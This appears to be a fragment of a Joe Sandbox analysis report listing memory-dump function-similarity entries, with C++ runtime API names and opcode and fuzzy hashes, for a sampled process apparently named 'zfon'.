                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: ExceptionFacet_RegisterThrow_lock_localesctypestd::_std::bad_alloc::bad_alloc
                                                                                                • String ID:
                                                                                                • API String ID: 2716750221-0
                                                                                                • Opcode ID: 7a11b1e22366df953c56bcdb6bf69edafa6fe217a70891a973f310d91d7d0277
                                                                                                • Instruction ID: d2ac9404135f199fe9b7c2e97b643ae4f25acf3420f62bbc3481890d8079bfce
                                                                                                • Opcode Fuzzy Hash: 7a11b1e22366df953c56bcdb6bf69edafa6fe217a70891a973f310d91d7d0277
                                                                                                • Instruction Fuzzy Hash: 03417C62E0CAC6D1EE119F2DE8401B96761EB98BE4F584231EB6D077E5DE3CE446A700
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: ___lc_codepage_func___lc_locale_name_func__pctype_funcislower
                                                                                                • String ID:
                                                                                                • API String ID: 2234106055-0
                                                                                                • Opcode ID: 07b5da062168d5669a39c56d43f65f3b717084410d52d1df7f7576f4b81ce3ea
                                                                                                • Instruction ID: fed6ea8cf0d5d5527e280f2999c294b16425d94b6b730ad7e50f35e9383aa6a5
                                                                                                • Opcode Fuzzy Hash: 07b5da062168d5669a39c56d43f65f3b717084410d52d1df7f7576f4b81ce3ea
                                                                                                • Instruction Fuzzy Hash: 6031D926E0CBC186FB618F1EA45037D6A61EB94BD1F188035DB9E47795DE3CE446C710
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: isspace$free$CloseEventHandlemallocmemcpy
                                                                                                • String ID:
                                                                                                • API String ID: 902297528-0
                                                                                                • Opcode ID: afebb808071df177693384e420aa04bb1f73b567d595f9ed8da547e32d591526
                                                                                                • Instruction ID: 6511232db1fa0967fe15c69a1267ff6ae8f76115a39acbc436f7e479ce26802b
                                                                                                • Opcode Fuzzy Hash: afebb808071df177693384e420aa04bb1f73b567d595f9ed8da547e32d591526
                                                                                                • Instruction Fuzzy Hash: 1D415E22B08B4189E710EFA1D8503AC7376AB58B98F850135DE6D27BD9DF39D40AC3A0
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: ___lc_codepage_func___lc_locale_name_func__pctype_funcisupper
                                                                                                • String ID:
                                                                                                • API String ID: 3857474680-0
                                                                                                • Opcode ID: 697f0993e0c5f1d24f9c767484efc03f421657d87d9f7281fdc3a14322cfee9f
                                                                                                • Instruction ID: 8863bd177def4feb2d2cc6b1b4f1bd17cec6b7416a9a928a72c87e46b1922b5e
                                                                                                • Opcode Fuzzy Hash: 697f0993e0c5f1d24f9c767484efc03f421657d87d9f7281fdc3a14322cfee9f
                                                                                                • Instruction Fuzzy Hash: 0331B362E4CBC286FB514F1DA45037D6A62EB90BD1F1C8035DBAD07795DE6CE486C710
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2549874919.00007FF8BFB51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2549750292.00007FF8BFB50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549976829.00007FF8BFB63000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2550400824.00007FF8BFB68000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2550885347.00007FF8BFB69000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8bfb50000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: Name::operator+$Replicator::operator[]
                                                                                                • String ID:
                                                                                                • API String ID: 3863519203-0
                                                                                                • Opcode ID: 30a8f2f125bc470f5f47f8832dfa98d673ff8fbdfdee2d9a51f356af74556641
                                                                                                • Instruction ID: 5b1e10c39d5979367b62174d1307256390d76a968e5ec2f549239d4b0f78f9e8
                                                                                                • Opcode Fuzzy Hash: 30a8f2f125bc470f5f47f8832dfa98d673ff8fbdfdee2d9a51f356af74556641
                                                                                                • Instruction Fuzzy Hash: F8413472A08B8599FB01CFA8D8603AC77A0BB49B88F688135DB4D57799DF7CA445C350
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: ExceptionFacet_RegisterThrow_lock_localesmessagesstd::_std::bad_alloc::bad_alloc
                                                                                                • String ID:
                                                                                                • API String ID: 1958836-0
                                                                                                • Opcode ID: d5d33d89c34cbe04dcd739ab9c1e0f669668da78f4d51707938014589a4dc942
                                                                                                • Instruction ID: f780f7690222bf5b7413616efee1e38eaf8a88afafa5fd179cabd7b26468f229
                                                                                                • Opcode Fuzzy Hash: d5d33d89c34cbe04dcd739ab9c1e0f669668da78f4d51707938014589a4dc942
                                                                                                • Instruction Fuzzy Hash: 42314C22A0CAC2C1EE11DF2DE4402BA6765EB84BE0F580632DB6D077E5EF2CE546D710
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: ExceptionFacet_RegisterThrow_lock_localesmessagesstd::_std::bad_alloc::bad_alloc
                                                                                                • String ID:
                                                                                                • API String ID: 1958836-0
                                                                                                • Opcode ID: aee45d2215da4ce7b0f3772c3ce5b61431520466d490ceabc17ed64f9b1dc149
                                                                                                • Instruction ID: c249167a20c75ba30cf541a3469a714f3385d445755fbc12d231703b84a23fa5
                                                                                                • Opcode Fuzzy Hash: aee45d2215da4ce7b0f3772c3ce5b61431520466d490ceabc17ed64f9b1dc149
                                                                                                • Instruction Fuzzy Hash: 98319F22E0CA9696EB10DF2DE4410BA6765FB84BE0F580231DB5D07BE5EF3CE542A700
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: ExceptionFacet_RegisterThrow_lock_localescodecvtstd::_std::bad_alloc::bad_alloc
                                                                                                • String ID:
                                                                                                • API String ID: 3627902316-0
                                                                                                • Opcode ID: 9b1c32e4d03cbda99e153f31f72f21e24241e85f2033266064f8f55f5d5db2b3
                                                                                                • Instruction ID: 8543544ffbe8df2926b9cf13b924b862047819e3247076de7f87865d887ecc55
                                                                                                • Opcode Fuzzy Hash: 9b1c32e4d03cbda99e153f31f72f21e24241e85f2033266064f8f55f5d5db2b3
                                                                                                • Instruction Fuzzy Hash: D6314C62A0CA82D1EF119F1DE9501B977A1EB84BE0F584232DB6D077E6EE2CE5469700
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: ExceptionFacet_RegisterThrow_lock_localesmessagesstd::_std::bad_alloc::bad_alloc
                                                                                                • String ID:
                                                                                                • API String ID: 1958836-0
                                                                                                • Opcode ID: f3470c7af5e1219ea517dc311023a40c6ff5171f338326e24b56031dd2e8a965
                                                                                                • Instruction ID: e6b17e840f27d599b693d4beb32cbb98b4c487fb67e6ca3ac4eedc76d39374aa
                                                                                                • Opcode Fuzzy Hash: f3470c7af5e1219ea517dc311023a40c6ff5171f338326e24b56031dd2e8a965
                                                                                                • Instruction Fuzzy Hash: 3D319C66A0CA96C1EE109F2DE4411BA6761FB84BE0F184632DB6E077E9DF3CE5439700
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: ExceptionFacet_RegisterThrow_lock_localesctypestd::_std::bad_alloc::bad_alloc
                                                                                                • String ID:
                                                                                                • API String ID: 2716750221-0
                                                                                                • Opcode ID: 8a0be3e0796e4bd00e343c49d07b79d543f220f19bcd707963a39a8b0941f0ab
                                                                                                • Instruction ID: 5ede2a8ae56eeece70392695532ee88479cbbb33998063c15ce8ede886f38c4c
                                                                                                • Opcode Fuzzy Hash: 8a0be3e0796e4bd00e343c49d07b79d543f220f19bcd707963a39a8b0941f0ab
                                                                                                • Instruction Fuzzy Hash: 0D316D62A4CAC2C1EF109F2DE4411B96765EB94BE0F584232EB6D077E5DE3CE546AB00
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: ExceptionFacet_RegisterThrow_lock_localesmessagesstd::_std::bad_alloc::bad_alloc
                                                                                                • String ID:
                                                                                                • API String ID: 1958836-0
                                                                                                • Opcode ID: d72c8285eb6784160f7c4d4e6db8a24b104de1abd3a77db1aa6ba5dcb5cfb000
                                                                                                • Instruction ID: ab43bf14cef86414b7a013fd6acb7c0455aca74f9f81b0586b130b3edd18a6a1
                                                                                                • Opcode Fuzzy Hash: d72c8285eb6784160f7c4d4e6db8a24b104de1abd3a77db1aa6ba5dcb5cfb000
                                                                                                • Instruction Fuzzy Hash: 3D31C421E0CBC691EB149F1DE4410BA6764EB85BE0F584632DB5E077E5EE3CE486A300
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: ExceptionFacet_RegisterThrow_lock_localesmessagesstd::_std::bad_alloc::bad_alloc
                                                                                                • String ID:
                                                                                                • API String ID: 1958836-0
                                                                                                • Opcode ID: b1a0f79d3326f903962460f08adc2b2298a43f582fbf5ad1d06f8bf332c444d0
                                                                                                • Instruction ID: 238599c8892aee91464b0f8efcc539017a24974b6770d8f4aaa18676552bbc98
                                                                                                • Opcode Fuzzy Hash: b1a0f79d3326f903962460f08adc2b2298a43f582fbf5ad1d06f8bf332c444d0
                                                                                                • Instruction Fuzzy Hash: 9A313B62A0CAC2C1EF109F5DE8401B967A5EB94BE4F580632DB6E07BE5DF3CE5469700
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: ExceptionFacet_RegisterThrow_lock_localescodecvtstd::_std::bad_alloc::bad_alloc
                                                                                                • String ID:
                                                                                                • API String ID: 3627902316-0
                                                                                                • Opcode ID: 145bbbc3bc158e60b2dcae730ae36a5f341c077dba051ea11f4e148b8dfc7de4
                                                                                                • Instruction ID: 0ca20e74410bc43e4aa6b9289afa99b6156920be8ac701f32970521771245d75
                                                                                                • Opcode Fuzzy Hash: 145bbbc3bc158e60b2dcae730ae36a5f341c077dba051ea11f4e148b8dfc7de4
                                                                                                • Instruction Fuzzy Hash: C5315C22A0CA82D1EF519F2DE8401B967A0FB94BE0F584231DB5D477E5DE3CE5469B00
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: ExceptionFacet_RegisterThrow_lock_localesmoneypunctstd::_std::bad_alloc::bad_alloc
                                                                                                • String ID:
                                                                                                • API String ID: 3095117837-0
                                                                                                • Opcode ID: 38913df2d96a4eec83f92b864a390790dea28e991f3c948397feb914cf3f0946
                                                                                                • Instruction ID: 5a4038adf7eef1e752b4206d02cf0d0ab9eda7cfe5dd6e9d550045ea5153ee90
                                                                                                • Opcode Fuzzy Hash: 38913df2d96a4eec83f92b864a390790dea28e991f3c948397feb914cf3f0946
                                                                                                • Instruction Fuzzy Hash: 4B31AB22A0CAC6D1EE509F5DE4402B967A1FB94BE0F180232DB5E077E9EF3CE5029740
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: ExceptionFacet_RegisterThrow_lock_localesmoneypunctstd::_std::bad_alloc::bad_alloc
                                                                                                • String ID:
                                                                                                • API String ID: 3095117837-0
                                                                                                • Opcode ID: 4ac604afad432e19ffdebc53a4f7af755cceacbe3725a61eabefcaaf70d51ce8
                                                                                                • Instruction ID: 869f7a923b645a4779338bdae7fd8d1e281f0b072e2a03c4db1262f80f581c30
                                                                                                • Opcode Fuzzy Hash: 4ac604afad432e19ffdebc53a4f7af755cceacbe3725a61eabefcaaf70d51ce8
                                                                                                • Instruction Fuzzy Hash: 96315962A08AC2C2EE119F1DE4401B967A1FB84BE4F580632DB5E476E9DF2CF5479700
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: ExceptionFacet_RegisterThrow_lock_localesnumpunctstd::_std::bad_alloc::bad_alloc
                                                                                                • String ID:
                                                                                                • API String ID: 448217422-0
                                                                                                • Opcode ID: c696fc2c3a6b5382072ca97f56a1b127eb086680fd410d12b52d6abaed43ced8
                                                                                                • Instruction ID: 206eded28e15559c3b7c88207e8ad84ba2b88687863e8c87f2078468415394ef
                                                                                                • Opcode Fuzzy Hash: c696fc2c3a6b5382072ca97f56a1b127eb086680fd410d12b52d6abaed43ced8
                                                                                                • Instruction Fuzzy Hash: CF314962A08AC2D1EE109F2DE4502B96760FB94BE0F584632EB5E07BE5DF3CE5469710
                                                                                                APIs
                                                                                                Memory Dump Source
